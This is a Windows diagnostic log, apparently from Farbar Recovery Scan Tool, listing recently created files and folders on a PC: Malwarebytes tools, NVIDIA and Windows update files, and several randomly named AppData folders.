2017-08-01 12:17 - 2017-08-03 22:03 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Desktop\mbar-1.09.3.1001.exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
